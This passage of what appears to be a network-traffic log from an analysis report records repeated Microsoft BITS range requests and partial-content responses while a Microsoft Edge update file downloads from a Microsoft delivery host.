                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c902ed4-2915334016-62
                Ocn-Served-By: QLT
                Content-Range: bytes 12388151-13148770/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=13148771-14063228
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:56 GMT
                Content-Type: application/octet-stream
                Content-Length: 914458
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c904a6a-2915334016-63
                Ocn-Served-By: QLT
                Content-Range: bytes 13148771-14063228/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=14063229-14800740
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:57 GMT
                Content-Type: application/octet-stream
                Content-Length: 737512
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9066a1-2915334016-64
                Ocn-Served-By: QLT
                Content-Range: bytes 14063229-14800740/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=14800741-15458706
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:59 GMT
                Content-Type: application/octet-stream
                Content-Length: 657966
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c908923-2915334016-65
                Ocn-Served-By: QLT
                Content-Range: bytes 14800741-15458706/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=15458707-16615285
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:01 GMT
                Content-Type: application/octet-stream
                Content-Length: 1156579
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c90bf76-2915334016-66
                Ocn-Served-By: QLT
                Content-Range: bytes 15458707-16615285/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=16615286-17880918
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:02 GMT
                Content-Type: application/octet-stream
                Content-Length: 1265633
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c90db04-2915334016-67
                Ocn-Served-By: QLT
                Content-Range: bytes 16615286-17880918/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=17880919-19545286
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:03 GMT
                Content-Type: application/octet-stream
                Content-Length: 1664368
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c90fa4a-2915334016-68
                Ocn-Served-By: QLT
                Content-Range: bytes 17880919-19545286/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=19545287-20811380
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:05 GMT
                Content-Type: application/octet-stream
                Content-Length: 1266094
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c91278d-2915334016-69
                Ocn-Served-By: QLT
                Content-Range: bytes 19545287-20811380/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=20811381-23089236
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:06 GMT
                Content-Type: application/octet-stream
                Content-Length: 2277856
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c914322-2915334016-70
                Ocn-Served-By: QLT
                Content-Range: bytes 20811381-23089236/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=23089237-25947883
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:07 GMT
                Content-Type: application/octet-stream
                Content-Length: 2858647
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c915ef6-2915334016-71
                Ocn-Served-By: QLT
                Content-Range: bytes 23089237-25947883/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=25947884-28403981
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:08 GMT
                Content-Type: application/octet-stream
                Content-Length: 2456098
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c917a71-2915334016-72
                Ocn-Served-By: QLT
                Content-Range: bytes 25947884-28403981/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=28403982-30966651
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:09 GMT
                Content-Type: application/octet-stream
                Content-Length: 2562670
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c919724-2915334016-73
                Ocn-Served-By: QLT
                Content-Range: bytes 28403982-30966651/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=30966652-33188701
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:11 GMT
                Content-Type: application/octet-stream
                Content-Length: 2222050
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c91cf84-2915334016-74
                Ocn-Served-By: QLT
                Content-Range: bytes 30966652-33188701/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=33188702-36421062
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:12 GMT
                Content-Type: application/octet-stream
                Content-Length: 3232361
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c91eb36-2915334016-75
                Ocn-Served-By: QLT
                Content-Range: bytes 33188702-36421062/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
